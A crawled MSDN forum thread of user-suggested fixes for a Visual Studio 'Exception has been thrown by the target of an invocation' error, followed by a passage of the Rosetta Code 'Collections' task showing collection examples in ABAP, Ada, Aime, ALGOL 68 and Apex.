Microsoft.Windows.Design.Metadata.DeveloperMetadata.DeveloperMetadataBuilder.AddWebBrowserAttributes() at Microsoft.Windows.Design.Metadata.DeveloperMetadata.DeveloperMetadataBuilder..ctor() at Microsoft.Windows.Design.Metadata.DeveloperMetadata.get_CustomAttributes() at Microsoft.Windows.Design.Metadata.DeveloperMetadata.Initialize() Tuesday, October 21, 2008 10:03 AM - Edited by doyle.ellsworth Tuesday, October 21, 2008 10:10 AM - I have the same issue on message box invocation: if (MessageBox.Show("Start simulation ?", "Title", MessageBoxButtons.YesNo, MessageBoxIcon.Question) == DialogResult.Yes) { backgroundWorker1.RunWorkerAsync(); } else { return; } Removing this invocation fixes the problem for me. Tuesday, February 24, 2009 2:02 PM - I ran into this problem in a windows app solution, one of my custom components read to a DB in the constructor after initialization. Solution didn't like that, so I created a public method and called that from the parent form after it loaded.Just another solution to add to the bunch.Wednesday, April 08, 2009 6:00 Friday, June 05, 2009 8:43 AM - Proposed as answer by BirukSolomon Wednesday, October 28, 2009 7:46 This worked brilliantly, thank you. At the moment I was writing new unit tests in a fresh Solution while TFS was down, this did the trick.Thursday, June 18, 2009 8:06 PM - From the application side I was installing an asp application that I know works properly in other enviornments but I was getting the same error. The fix ended up being a repair to .net framework 3.5.Wednesday, August 19, 2009 7:36 Great .. thank youThursday, January 28, 2010 10:33 AM It's a "Five Step Program" that really works! Brilliant solution! Looking forward to a fix because that error message is pretty cryptic.Thursday, May 06, 2010 8:28 PM In case you are using TFS (team foundation server), for some reason your solution went offline and when you make it go online again it will fix the issue. 1) Open your solution 2) Right Click the solution and click "Go Online" 3) Re-run the test. By now that error message must have gone awaySaturday, July 17, 2010 1:05 AM I have the same problem on VS2008 SP1. After disconnect/reconnect solution from TFS all work correctly.Saturday, August 21, 2010 5:52 PM - the solution of this problem comes from a beug microsoft for, use the unit testing tool for Visual Studio 2008, will require a support request for the hotfix hostfix, this fix is unfortunately protected by the laws of use here is the link to request software is VS90SP1-KB980216-x86.exeMonday, October 18, 2010 3:44 PM If you have .edmx file in your project then please change the properties 1. Right click on .edmx file select properties 2. Please Change Build Action: Entity Deploy F5 to see whether it's fixed ThanksWednesday, September 21, 2011 7:01 AM - Hi, have you solved the problem? can you tell me how , i'm so freak out of it now.Tuesday, November 15, 2011 3:04 AM rajaram, Have you ever found the solution to your error? I have the same problem!!!! fffzThursday, February 02, 2012 11:24 PM @sanket ... Test -> Windows -> Test Results. still gives "Exception has been thrown by the target of an invocation" :(Monday, February 13, 2012 1:23 PM Has anyone found a solution to this problem. I have the same issue When I try to save the webtest I get the exception "Exception thrown by the target of invocation". The regular website works properly I m facing issue with the webtest only. I m using Windows Vista - VS2010 Premium Thursday, March 15, 2012 6:24 AM - Edited by shreyamalani Thursday, March 15, 2012 6:24 AM Hi shreyamalani can you please check following checkpoint in your application.. 1)Check for TFS connectivity.You may not have access to TFS projects or TFS is not connected. 2)Check if you are inheriting any class with out service namesapce(.). 3)Check your are trying to refer a method with out instantani.. it.Monday, September 17, 2012 8:23 AM
http://social.msdn.microsoft.com/Forums/en-US/8bd8da75-76d2-4257-aeee-d040e6167bf9/exception-has-been-thrown-by-the-target-of-an-invocation?forum=vstsprofiler
CC-MAIN-2014-15
refinedweb
3,598
57.27
Communities CMDB Federation Retrieval Method - To view federated dataDeepak S May 2, 2018 1:26 AM Hi Friends, Need your help on the Retrieval method of CMDB federation. I have followed the BMC documentation and created the fed as below: - Created a Repository plugin on JDBC adapter to connect to a Oracle DB. Its successful and plugin is loaded. - Using the Retrieval Definitions, I created a federated data class as shown below. - Created a Federated Relationship class as below: Now I don’t know where I can see the federated data. I launched the Atrium Explorer, but could see only the CI and its relationships. Not sure where I can visualize the Federated data. I did not find any documentation on this one, also nothing in YouTube videos, and hardly anything on community. Thanks, Deepak 1. Re: CMDB Federation Retrieval Method - To view federated dataJeremy Ashe May 3, 2018 2:57 PM (in response to Deepak S)1 of 1 people found this helpful I'm having the same issue. This is what I've tried so far based on this comment from the Atrium documentation: "Federated data is information about a configuration item (CI) that is stored outside BMC Atrium CMDB and is linked to CIs in BMC Atrium Configuration Management Database (BMC Atrium CMDB). BMC Atrium Explorer allows you to retrieve federated instances that are related to a core CI in the BMC Atrium CMDB." And also here, instructions to view federated data related to a CI (it sounds like this is what you are doing above): Viewing federated data in BMC Atrium Explorer - Documentation for BMC Atrium Core 9.1 - BMC Documentation I've created the federated data class (assets in a legacy Remedy database) and a federated relationship class to the BMC_Person CI Class using the username which is stored on both records. I found a person record that I know has a match in the legacy assets and dropped it into the Atrium Explorer but there are no child IDs found for me. I'm wondering if the federated data, which has a distinct namespace (BMC.Fed) is maybe also stored in a different dataset. 2. Re: CMDB Federation Retrieval Method - To view federated dataDeepak S May 4, 2018 12:03 AM (in response to Jeremy Ashe) Thanks Jeremy for the update. Looks like there was some issue in Atrium Explorer, however I can see the data in the Fedetared data class forms created. 3. Re: CMDB Federation Retrieval Method - To view federated dataCarey Walker May 6, 2018 2:54 AM (in response to Deepak S) Hi Deepak and Jeremy, I had pretty much the same issue about a year back. It required a hot fix from BMC to resolve. This fix was supposed to be included in 9.1.03 and above, so if you are already at tat version or above, it won't be the same issue. So I had done all the set up required correctly, I could see the federated class form and if I searched that form, it correctly populated the data from the federation source (in my case it was simply a test table we created in the ARSYSTEM DB). This proved that all the ODBC/JDBC config was correct and that the relationship from the federated class (the key attributes etc) were working. Except that in Atrium Explorer, when you double clicked (or select Expand Both) for the CI class that was supposed to have the related federation class, nothing happened! Original ticket number with support was 00103194. If you have a test area where you can be a bit reckless , please try the following. Find the CI you are federating FROM. I'll assume it's in BMC.ASSET and has been reconciled so has a valid recon. id (i.e. it is not 0). Set the reconid back to 0 (after saving it's value somewhere). Save the CI. Now go back to Atrium Explorer and try the double-click or expand both on the CI again. If you have the same issue, voila you will see the federated class related to the core CI and you will be able to use the functionality as expected (i.e. drill in to see attributes etc). Please let us know how this goes. 4. Re: CMDB Federation Retrieval Method - To view federated dataDeepak S May 7, 2018 5:40 AM (in response to Carey Walker)1 of 1 people found this helpful Thanks Carey, I guess I have tried already making the recon Id = 0 and cheked but still I was not able to visualize the Fed data in Atrium Explorer Thanks, Deepak
https://communities.bmc.com/thread/178764
CC-MAIN-2019-35
refinedweb
776
60.35
Contents PxrAttribute allows the user to read attributes attached to (stored) on a node. Such an example would be to add a color attribute to a set of objects to be read by a material later. In this way, a material can change its result based on the object being rendered instead of a different material. Below there are color attributes attached to the sphere's of the shader ball. A single PxrSurface material renders with a different diffuse color as specific by each shape's defined attribute. Examples on usage are below. There may be a performance penalty for using this node in many places in your scene. Efficiency is key to avoid too many evaluations of user attributes if not necessary. Input Parameters Variable name This field takes a string that identifies the attribute. The string should include the namespace for the attribute and the attribute name separated by a colon. For example, trace:maxdiffusedepth or user:Ball. Variable Type This specifies the type of variable to read and must match what was specified above on the other nodes. - Integer - Float - Float 2 - Color - Point - Vector - Normal Output Parameters resultF A float result. resultRGB The color result. Example Usage DCC applications may use a different mechanism for applying a user attribute. Below are two examples for applying a color user attribute named "Ball" to a shape: Maya: Add a Pre Shape MEL attribute to the shape using the Attibutes > RenderMan menu RiAttribute "user" "color Ball" 1 0.2 0.65 Katana: The below is an OpScript example of the same attribute in Katana gb = GroupBuilder() gb:set("value", FloatAttribute({1.0, 0.2, 0.65}, 3)) gb:set("type", StringAttribute("color")) Interface.SetAttr("prmanStatements.attributes.user.Ball", gb:build()) Houdini: See Using PxrMatteID as an example of how to add user attribute in Houdini.
https://rmanwiki.pixar.com/display/REN/PxrAttribute?reload=true
CC-MAIN-2022-33
refinedweb
306
56.25
Programmer, Geek, ASPInsiderA blog about code and data access I have a posted a project on Codeplex at. It is a T4 template to give you a data layer that follows Repository and Unit of Work patterns that is also ready for Dependency Injection (DI). DI frameworks allow you to build code that is more testable and allows for a greater separation of concerns (SoC). This is not the only use for them, but it is a big one and what they are commonly popular for. You don’t have to use DI to get a good separation of concerns, but it certainly can help. It is one of the most important things that developers can do to make their code more maintainable but is unfortunately one of the things that is commonly overlooked. Most applications these days work with data at some point and a large amount of them use relational databases. Many developers use Object Relational Mapping (ORM) tools to make that process easier. Entity Framework is Microsoft’s ORM and data access strategy moving forward. LINQ to SQL also exists but Entity Framework is where the new innovation will happen. As such, it is easy to use the ORM tool as your data access layer and not just a data access technology. While this works, it doesn’t lend it self to an application with a good separation of concerns. When I build an application, I normally try to separate the code out by assemblies into logical pieces. If you don’t separate by assemblies, at they very least separate by namespaces. This will give you the ability to separate by assemblies later if you need to. One common thing I like to separate is the data access layer. There are several reasons for this, but one of the biggest is simply for code reuse. I rarely write an application that doesn’t have multiple pieces that need to access data so having it separated reduces duplication and thus lends to a more maintainable and sustainable application. So what does this have to do with my T4 template project on CodePlex. This template will generate files necessary to give you a persistent ignorant, testable data layer without having to write a great deal of code. I am huge fan of code gereration where it makes sense and this is one area where I think it does. I also feel that you should know what code generation is doing. This makes debugging much easier. I am going to focus on this post on what files are generated and how to use what is there to build your data layer. I will have additional samples available in the future with different DI frameworks and more advanced samples. The template looks for an .edmx file in the same directory with it and will generate several files based on your model. Most of these files will be re-generated when the T4 template is executed but there are few that will not. These will allow you to put custom logic in those files without having to create your own partial classes. IRepository.cs IUnitOfWork.cs EFRepository.cs EFUnitOfWork.cs RepositoryIQueryableExtensions.cs {EntityName}Repository.cs {EntityName}Repository.Generated.cs IRepository.cs : Interface for the Repository portion. This is one of two interfaces that are generated. It is structured so that when mocking for testing, you only need to mock the two interfaces and everything wil fal into place properly. 1: public interface IRepository<T> 2: { 3: IUnitOfWork UnitOfWork { get; set; } 4: IQueryable<T> All(); 5: IQueryable<T> Find(Func<T, bool> expression); 6: void Add(T entity); 7: void Delete(T entity); 8: void Save(); 9: } You can see there is a property for an IUnitOfWork which will hold the actual context. Basic CRUD functions are exposed here as well. This will likely be expanded as the project grows and matures. Feel free to give me feedback on anything you would like to see added here. IUnitOfWork.cs : Interface for the Unit of Work 1: public interface IUnitOfWork 3: ObjectContext Context { get; set; } 4: void Save(); 5: bool LazyLoadingEnabled { get; set; } 6: bool ProxyCreationEnabled { get; set; } 7: string ConnectionString { get; set; } 8: } The ObjectContext in the UnitOfWork is the only dependency on Entity Framework in the project and is set to the real concrete ObjectContext in the EFUnitOfWork. The other properties are used to set properties on the object context without having to directly access the context itself. Since this interface is the gateway into the Entity Framework, this is the one that you will want to mock when building tests. EFRepository.cs : Concrete class for actually working with Entity Framework classes 1: public class EFRepository<T> : IRepository<T> where T : class 3: public IUnitOfWork UnitOfWork { get; set; } 4: private IObjectSet<T> _objectset; 5: private IObjectSet<T> ObjectSet 6: { 7: get 8: { 9: if (_objectset == null) 10: { 11: _objectset = UnitOfWork.Context.CreateObjectSet<T>(); 12: } 13: return _objectset; 14: } 15: } 16: 17: public virtual IQueryable<T> All() 18: { 19: return ObjectSet.AsQueryable(); 20: } 21: 22: public IQueryable<T> Find(Func<T, bool> expression) 23: { 24: return ObjectSet.Where(expression).AsQueryable(); 25: } 26: 27: public void Add(T entity) 28: { 29: ObjectSet.AddObject(entity); 30: } 31: 32: public void Delete(T entity) 33: { 34: ObjectSet.DeleteObject(entity); 35: } 36: 37: public void Save() 38: { 39: UnitOfWork.Save(); 40: } 41: } There is a lot going on here but the key thing to note in this file is the IObjectSet<T>. This is how the ObjectContext contained inside the Unit of Work knows which classes to work with. This class is the basis for all of our actual data layer classes as you will see shortly. Using a combination of the methods exposed here you should be able to do anything you need to do to query and work with entities. EFUnitOfWork.cs : Mostly properties that interface with the context. 1: public partial class EFUnitOfWork : IUnitOfWork 3: public ObjectContext Context { get; set; } 4: 5: public EFUnitOfWork() 7: Context = new DataModelContainer(); 8: } 9: 10: public void Save() 11: { 12: Context.SaveChanges(); 13: } 14: 15: ... 16: } In the constructor the actual concrete ObjectContext is set. This is added directly by the T4 template and is extracted directly from the .emdx file. The ObjectContext is exposed as a public property so you can access it directly if need be. There are two more classes that get gererated for each entity. They are {Entity}Repository.cs and {Entity)Repository.gererated.cs. The {Entity}Repository.generated.cs file contains the code that interfaces with the IRepository<T> and IUnitOfWork. The {Entity}Repository.cs classes are where you will set your own custom data layer logic. This is where this template will really help. If we have a Person entity we will have PersonRepository.cs and a PersonRepository.generated.cs. PersonRepository.gererated.cs : The glue that makes it all work 1: public partial class PersonRepository 3: private IRepository<Person> _repository {get;set;} 4: public IRepository<Person> Repository 5: { 6: get { return _repository; } 7: set { _repository = value; } 10: public PersonRepository(IRepository<Person> repository, IUnitOfWork unitOfWork) 12: Repository = repository; 13: Repository.UnitOfWork = unitOfWork; 14: } 15: 16: public IQueryable<Person> All() 17: { 18: return Repository.All(); 19: } 20: 21: public void Add(Person entity) 22: { 23: Repository.Add(entity); 24: } 25: 26: public void Delete(Person entity) 27: { 28: Repository.Delete(entity); 29: } 30: 31: public void Save() 32: { 33: Repository.Save(); 34: } 35: 37: } The first thing you will likely notice is that the class doesn’t inherit from anything. This is by design as I would still have to implement all of the methods if I inherited directly from IRepository<Person>. I have some plans to make a base class that will reduce the total amount of code, I’m just not finished with it yet. Be looking for that in the coming weeks. The PersonRepository class now has access to all of the basic methods from IRepository<T> because they are re-implemented here. The Repository property is what gives you the access to this. We have here basic CRUD operations to Add (Create) Read (Find) Update (Save) and Delete (Delete). All are very self explainitory with maybe the exception of Find. The Find method takes a lambda expression just like the Where clause of an IQueryable. In fact, it passes it directly to the Where clause of an IQueryable. While the methods in this class are great, they are not really meant to be used directly but rather through data access methods. You certainly can use them directly, but I would recommend another approach. The PersonRepository.cs file won’t get overwritten when the template runs so that is where you would put your logic. Let’s start by creating a method to find a person by their primary key. We will simply call it GetPerson(int personId). We will then call Repository.Find() and query for the personId: 1: public Person GetPerson (int personId) 3: return Repository.Find(p => p.PersonId == personId).FirstOrDefault(); 4: } We use the Repository property that is in the generated file to gain access to the Entity Framework. We are doing a basic query here to find the person based on their associated personId. we are calling FirstOrDefault() to return teh first entity that is in the result set. If there are none, it will return null. We could just use First(), but it would through an exception and I would rather do a null check personally. Now that we have a method to use, let’s use it. The first thing you need to do to create PersonRepository instance so you can access the newly created method: The PersonRepository has a constructor that does takes in a couple of properties: 1: public PersonRepository(IRepository<Person> repository, IUnitOfWork unitOfWork) It looks for an IRepository<Person> and an IUnitOfWork. These can be satisfied by using an EFRepository<Person> and an EFUnitOfWork. To create our instance we will use the following: 1: var personRepository = new PersonRepository(new EFRepository<Person>(), new EFUnitOfWork()); We can now call execute our method: 1: int personId = 1; 2: var person = personRepository.GetPerson(personId); If person comes back null, then we know it wasn’t found. Otherwise, we have our entity to start working with. It’s as easy as that. Now if you notice, I created a new EFUnitOfWork. This is fine if you are only using one repository class. If you need to actively use more than one, you will need to create a separate unit of work and pass it in. We also have an AddressRepository so it would look like this: 1: var unitOfWork = new EFUnitOfWork(); 2: var personRepository = new PersonRepository(new EFRepository<Person>(), unitOfWork); 3: var addressRepository = new AddressRepository(new EFRepository<Address>(), unitOfWork); 4: 5: // Do some stuff requiring saving 6: 7: unitOfWork.Save(); Here is where the unit of work pattern comes into play. You can perform multiple action on the unit of work within multiple repositories and then call Save at once. the Save() call inturn calls the SaveChanges() method on the ObjectContext which will by default wrap the entire unit of work in a transaction. If anything fails, the whole operation is rolled back. Now these methods aren’t as easily testable as they could be. In the next post we will look at how it works with Dependency Injection and specifically StructureMap. StructureMap makes the methods more testable and at the same time make the whole process easier without adding unecessary complexity. Go to efrepository.codeplex.com to download! Skin design by Mark Wagner, Adapted by David Vidmar
http://geekswithblogs.net/danemorgridge/archive/2010/06/28/entity-framework-repository-amp-unit-of-work-t4-template-on.aspx
CC-MAIN-2014-15
refinedweb
1,933
54.83
hello everybody! i’m working on a programm that has that peace of code: def show_titles file = File.read(“articles_file.txt”) raw_articles = file.split("\n\n") raw_articles.each do |elem| title, *text = elem.split("\n") @array_of_splits << Article.new(title, text.join(" ")) end @array_of_splits.each_with_index do |elem, index| puts “#{index}: #{elem.title}” end the next thing i wanna do is to let the user through gets pick the title and then the whole article must show up in a console. For example: - Title 1 - Title 2 - Title 3 Pick the title of the article gets = 2 Title 2 text 2 text 2… The question is how can i do that using each_with_index ? Thank u!
https://www.ruby-forum.com/t/each-with-index/196190
CC-MAIN-2022-21
refinedweb
113
58.99
Python wrapper for the OSM API Project description |Build| |Coverage| |Version| |Downloads| |License| Python wrapper for the OSM API Installation Install osmapi simply by using pip: pip install osmapi Documentation The documentation is generated using pdoc and can be viewed online. The build the documentation locally, you can use pdoc --html osmapi.OsmApi # create HTML file This project uses GitHub Pages to publish its documentation. To update the online documentation, you need to re-generate the documentation with the above command and update the gh-pages branch of this repository. Examples Read from OpenStreetMap import osmapi api = osmapi.OsmApi() print api.NodeGet(123) # {u'changeset': 532907, u'uid': 14298, # u'timestamp': u'2007-09-29T09:19:17Z', # u'lon': 10.790009299999999, u'visible': True, # u'version': 1, u'user': u'Mede', # u'lat': 59.9503044, u'tag': {}, u'id': 123} Constructor import osmapi api = osmapi.OsmApi(api="api06.dev.openstreetmap.org", username = "you", password = "***") api = osmapi.OsmApi(username = "you", passwordfile = "/etc/mypasswords") api = osmapi.OsmApi(passwordfile = "/etc/mypasswords") # username will be first line username Note: The password file should have the format user:password Write to OpenStreetMap import osmapi api = osmapi.OsmApi(username = u"metaodi", password = u"*******") api.ChangesetCreate({u"comment": u"My first test"}) print api.NodeCreate({u"lon":1, u"lat":1, u"tag": {}}) # {u'changeset': 532907, u'lon': 1, u'version': 1, u'lat': 1, u'tag': {}, u'id': 164684} api.ChangesetClose() Note Scripted imports and automated edits should only be carried out by those with experience and understanding of the way the OpenStreetMap community creates maps, and only with careful planning and consultation with the local community. See the Import/Guidelines and Automated Edits/Code of Conduct for more information. Development If you want to help with the development of osmapi, you should clone this repository and install the requirements: pip install -r requirements.txt pip install -r test-requirements.txt After that, it is recommended to install the flake8 pre-commit-hook: flake8 --install-hook Tests To run the tests use the following command: nosetests --verbose By using tox you can even run the tests against different versions of python (2.6, 2.7, 3.2 and 3.3): tox Attribution This project was orginally developed by Etienne Chove. This repository is a copy of the original code from SVN (), with the goal to enable easy contribution via GitHub and release of this package via PyPI. See also the OSM wiki: Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/osmapi/0.6.2/
CC-MAIN-2019-51
refinedweb
433
56.76
Webscraping in Python with Flask and BeautifulSoup 4 Tanmay Naik Updated on ・6 min read What is web scraping? Web scraping is a term used for the process of extracting HTML/XML data from websites. Once extracted, it can be parsed into a different HTML file or saved locally in text/spreadsheet documents. Who does it? A lot of websites that aggregate data from other websites on the internet. Some examples could be websites that give you the best deals on the same product after comparing across multiple platforms (Amazon, Flipkart, Ebay, etc.), and also sites that collect datasets to apply ML algorithms to. How is it useful to me? I would recommend you to limit your thinking to how something could benefit you especially when you know little to nothing about it. It helps to be a generalist when you’re just starting out. Learn everything, you never know when you’ll need it! You can always settle and specialize in one area eventually, when you’re well aware of the options you have. What we’ll need - Python v3.6.8 - VSCode Installing Python (skip if already installed) - Go to — python.org > Downloads > Windows - Scroll to version 3.6.8 > x86 (32 bit) / x86–64 (64 bit) > Executable - Double-click and check “Add Python to PATH” - Follow the installation instructions. - Check if correctly installed - Press Windows key+R > Type “cmd” to open the command line. - In the command line > Type, - python --version If Python is installed correctly, you should see, 3.6.8 in the terminal. Installing VSCode (skip if already installed) VSCode is a free code editor with lots of features that make writing and debugging code much easier. - Go to code.visualstudio.com > Download for Windows > x86/x64 > Installer. - Double-click and follow the instructions. Let’s begin! - Create a new folder and call it “Webscraper” - Inside the folder, create a new file named webscraper.py - Open VSCode > File > Open Folder > Navigate to “Webscraper” Now we need to import a few libraries which will help us build our web scraper. - Go to Terminal > New Terminal This is basically the command line but within the editor so we don’t have to have two windows and keep switching between them. - Next we call pip You could call it the Alfred to Python’s Batman. Hehe. - In your terminal, type pip install beautifulsoup4 This installs the beautifulsoup library which will help us scrape webpages. - Next type pip install flaskand pip install requests Flask is a lightweight framework to build websites. We’ll use this to parse our collected data and display it as HTML in a new HTML file. The requests module allows us to send http requests to the website we want to scrape. In your file, type the following code: from flask import Flask, render_template from bs4 import BeautifulSoup import requests The first line imports the Flask class and the render_template method from the flask library. The second line imports the BeautifulSoup class, and the third line imports the requests module from our Python library. Next, we declare a variable which will hold the result of our request source = requests.get(‘').text We send a GET request to and convert the HTML to plain text and store that in the source variable. Next we declare a soup variable and store the value we get after passing source to BS. ‘lxml’ is the markup we want our rendered code to have. soup = BeautifulSoup(source, 'lxml') At this point, we have our code working. You can check it out by passing soup to a print function, like this print(soup) after the previous line and running python webscraper.py in the terminal. Right now, we are pulling the entire web page rather than specific elements on it. To get specific elements, you can try these by yourself. But before you do that, you should be aware of what exactly you want to get. You can either run the last command again or open the web page in the browser and inspect it by right clicking on the page. Some knowledge of HTML DOM and CSS is required here. You can head over to W3Schools or MDN for a quick crash course on both. <variable> = soup.find('<HTML_element_name>') <variable> = soup.find('<HTML_element_name>').select_one('child_element') <variable> = soup.find('<HTML_element_name>').find_all('child_element') You can pass regular CSS notation in the brackets to be more specific about the elements you want. Now, we are only actually just outputting HTML along with the text inside it. What if we just want the text? That’s easy. We simply pass .text at the end of it. Just like we did with source. Here’s an example. head = soup.find(‘main’).select_one(‘article:nth-of-type(4)’).div.text Here, we tell Python to store the text of the div in the 4th article element which is in the main element, in the head variable. You can check the output by passing head to print() and running python webscraper.py in the terminal. Try getting the names of one of the authors if you can. You can get an author like this, author = soup.find(‘main’).select_one(‘p’).text Notice how you also get the date along with the name. That’s because both of them share the same element. There is a way to get the author name separately by using Python string methods like split and slice. But we won’t cover that here. Next up, we will use flask to re-render our received data the way we want on a local server. In your file, type the following code, app = Flask(__name__) @app.route('/') def index(): return render_template('index.html,**locals()) app.run(debug=True) Create a new templates folder in your main webscraper folder and call it index.html The flask part is a little complicated to explain but to put it simply, we created a simple server that will take our index.html from the templates folder and serve it on a local server — localhost://5000 Now, we can combine multiple variables we declared in all the previous code using soup and pass the text to our HTML and use CSS to style them the way we want! You can use this code for the index.html file, <!DOCTYPE html> <html lang=”en”> <head> <meta charset=”UTF-8"> <meta name=”viewport” content=”width=device-width, initial-scale=1.0"> <meta http-equiv=”X-UA-Compatible” content=”ie=edge”> <title>Webscraper in Python using Flask</title> </head> <body> <!-- Variables from Flask here --> </body> </html> Now, we can use all the code we learned so far to create custom variables and pull specific data from our site. If we are well versed with the structure of our target site, we can use shortcuts like these. head = soup.header.h1.text second_author = soup.main.select_one(‘article:nth-of-type(2)’).p.text first_article = soup.main.article.div - Type these inside the index()function that we created, just above the return statement. - Save the file - Go to index.html Now we’ll pass these variables into our HTML while it gets rendered so we can see the data on our webpage. <!DOCTYPE html> <html lang=”en”> <head> <meta charset=”UTF-8"> <meta name=”viewport” content=”width=device-width, initial-scale=1.0"> <meta http-equiv=”X-UA-Compatible” content=”ie=edge”> <title>Webscraper in Python using Flask</title> </head> <body> <h1>{{ head }}</div> <p>{{ second_author }}</p> <article>{{ first_article }}</article> </body> </html> Now open the terminal and run python webscraper.py Aand we did it! If you’re wondering how it’s so easy, well, it’s not. This was just a single page, and a simple one at that, with no classes or IDs added to the HTML. But this is a good start. Wonder how you can scrape multiple pages? The answer is multiple for, while, try, except and if-else loops! Hello, this was my very first technical article. If you find any errors in the code or the way I approached the tutorial, feel free to correct me. I'm excited to be part of this community as I grow with it and intend to contribute meaningful content. Thank you for reading!
https://dev.to/blazephoenix/webscraping-in-python-with-flask-and-beautifulsoup-4-1pkl
CC-MAIN-2020-10
refinedweb
1,372
66.23
Collections You are encouraged to solve this task according to the task description, using any language you may know. Collections are abstractions to represent sets of values. In statically-typed languages, the values are typically of a common data type. - Task Create a collection, and add a few values to it. - See also - Array - Associative array: Creation, Iteration - Collections - Compound data type - Doubly-linked list: Definition, Element definition, Element insertion, Traversal Linked list - Queue: Definition, Usage - Set - Singly-linked list: Element definition, Element insertion, Traversal - Stack Contents - 1 ABAP - 2 Ada - 3 Aime - 4 ALGOL 68 - 5 Apex - 6 AutoHotkey - 7 AWK - 8 Axe - 9 BBC BASIC - 10 bc - 11 C - 12 C++ - 13 C# - 14 Clojure - 15 COBOL - 16 Common Lisp - 17 D - 18 E - 19 EchoLisp - 20 Elena - 21 Elixir - 22 Fancy - 23 Forth - 24 Fortran - 25 FreeBASIC - 26 Gambas - 27 Go - 28 Groovy - 29 Haskell - 30 Icon and Unicon - 31 J - 32 Java - 33 JavaScript - 34 jq - 35 Julia - 36 Kotlin - 37 Lingo - 38 Lisaac - 39 Logo - 40 Lua - 41 Maple - 42 Mathematica / Wolfram Language - 43 MATLAB / Octave - 44 NetRexx - 45 Nim - 46 Objeck - 47 Objective-C - 48 OCaml - 49 Oforth - 50 ooRexx - 51 Oz - 52 PARI/GP - 53 Pascal - 54 Perl - 55 Perl 6 - 56 Phix - 57 PHP - 58 PicoLisp - 59 PL/I - 60 PowerShell - 61 PureBasic - 62 Python - 63 R - 64 Racket - 65 Raven - 66 REXX - 67 Ring - 68 Ruby - 69 Rust - 70 Scala - 71 Scheme - 72 Seed7 - 73 Setl4 - 74 Sidef - 75 Slate - 76 Smalltalk - 77 Tcl - 78 TUSCRIPT - 79 UNIX Shell - 80 Ursala - 81 V - 82 Vim Script - 83 VBA - 84 Visual Basic .NET - 85 Visual FoxPro - 86 Wren - 87 zkl ABAP[edit] REPORT z_test_rosetta_collection. CLASS lcl_collection DEFINITION CREATE PUBLIC. PUBLIC SECTION. METHODS: start. ENDCLASS. CLASS lcl_collection IMPLEMENTATION. METHOD start. DATA(itab) = VALUE int4_table( ( 1 ) ( 2 ) ( 3 ) ). cl_demo_output=>display( itab ). ENDMETHOD. ENDCLASS. START-OF-SELECTION. NEW lcl_collection( )->start( ). Ada[edit] Ada 95 and earlier offers arrays. Ada 2005 adds the Ada.Containers package and its children. Examples of Doubly Linked Lists and Vectors are given. Ada 2005 also provides hashed and ordered Maps and Sets (not shown). anonymous arrays[edit] In Ada, arrays can be indexed on any range of discrete values. The example below creates an anonymous array indexed from -3 to -1. It initializes the three elements of the array at declaration. Then it reverses their order in the array. Anonymous arrays have no type associated with them that is accessible to the programmer. This means that anonymous arrays cannot be compared in the aggregate to other arrays (even those with the same index structure and contained type) or passed as a parameter to a subprogram. For these reasons, anonymous arrays are best used as singletons and global constants. procedure Array_Collection is A : array (-3 .. -1) of Integer := (1, 2, 3); begin A (-3) := 3; A (-2) := 2; A (-1) := 1; end Array_Collection; array types[edit] Because of the limitations of anonymous arrays noted above, arrays are more typically defined in Ada as array types, as in the example below. procedure Array_Collection is type Array_Type is array (1 .. 3) of Integer; A : Array_Type := (1, 2, 3); begin A (1) := 3; A (2) := 2; A (3) := 1; end Array_Collection; unconstrained arrays[edit] Dynamic arrays can be created through the use of pointers to unconstrained arrays. While an unconstrained array's index type is defined, it does not have a pre-defined range of indices - they are specified at the time of declaration or, as would be the case in a dynamic array, at the time the memory for the array is allocated. The creation of a dynamic array is not shown here, but below is an example declaration of an unconstrained array in Ada. procedure Array_Collection is type Array_Type is array (positive range <>) of Integer; -- may be indexed with any positive -- Integer value A : Array_Type(1 .. 3); -- creates an array of three integers, indexed from 1 to 3 begin A (1) := 3; A (2) := 2; A (3) := 1; end Array_Collection; doubly linked lists[edit] with Ada.Containers.Doubly_Linked_Lists; use Ada.Containers; procedure Doubly_Linked_List is package DL_List_Pkg is new Doubly_Linked_Lists (Integer); use DL_List_Pkg; DL_List : List; begin DL_List.Append (1); DL_List.Append (2); DL_List.Append (3); end Doubly_Linked_List; vectors[edit] with Ada.Containers.Vectors; use Ada.Containers; procedure Vector_Example is package Vector_Pkg is new Vectors (Natural, Integer); use Vector_Pkg; V : Vector; begin V.Append (1); V.Append (2); V.Append (3); end Vector_Example; Aime[edit] Aime collections include "list"s (sequences) and "record"s (associative arrays). Both types of collections are heterogenous and resize dynamically. Lists[edit] Declaring a list: list l; Adding values to it: l_p_integer(l, 0, 7); l_push(l, "a string"); l_append(l, 2.5); Retrieving values from a list: l_query(l, 2) l_head(l) l_q_text(l, 1) l[3] Records[edit] Declaring a record: record r; Adding values to it: r_p_integer(r, "key1", 7); r_put(r, "key2", "a string"); r["key3"] = .25; Retrieving values from a record: r_query(r, "key1") r_tail(r) r["key2"] ALGOL 68[edit] Arrays are the closest thing to collections available as standard in Algol 68. Collections could be implemented using STRUCTs but there are none as standard. Some examples of arrays: # create a constant array of integers and set its values # []INT constant array = ( 1, 2, 3, 4 ); # create an array of integers that can be changed, note the size mst be specified # # this array has the default lower bound of 1 # [ 5 ]INT mutable array := ( 9, 8, 7, 6, 5 ); # modify the second element of the mutable array # mutable array[ 2 ] := -1; # array sizes are normally fixed when the array is created, however arrays can be # # declared to be FLEXible, allowing their sizes to change by assigning a new array to them # # The standard built-in STRING is notionally defined as FLEX[ 1 : 0 ]CHAR in the standard prelude # # Create a string variable: # STRING str := "abc"; # assign a longer value to it # str := "bbc/itv"; # add a few characters to str, +=: adds the text to the beginning, +:= adds it to the end # "[" +=: str; str +:= "]"; # str now contains "[bbc/itv]" # # Arrays of any type can be FLEXible: # # create an array of two integers # FLEX[ 1 : 2 ]INT fa := ( 0, 0 ); # replace it with a new array of 5 elements # fa := LOC[ -2 : 2 ]INT; Apex[edit] Lists[edit] A list is an ordered collection of elements that are distinguished by their indices Creating Lists // Create an empty list of String List<String> my_list = new List<String>(); // Create a nested list List<List<Set<Integer>>> my_list_2 = new List<List<Set<Integer>>>(); Access elements in a list List<Integer> myList = new List<Integer>(); // Define a new list myList.add(47); // Adds a second element of value 47 to the end // of the list Integer i = myList.get(0); // Retrieves the element at index 0 myList.set(0, 1); // Adds the integer 1 to the list at index 0 myList.clear(); // Removes all elements from the list Using Array Notation for One-dimensional list String[] colors = new List<String>(); List<String> 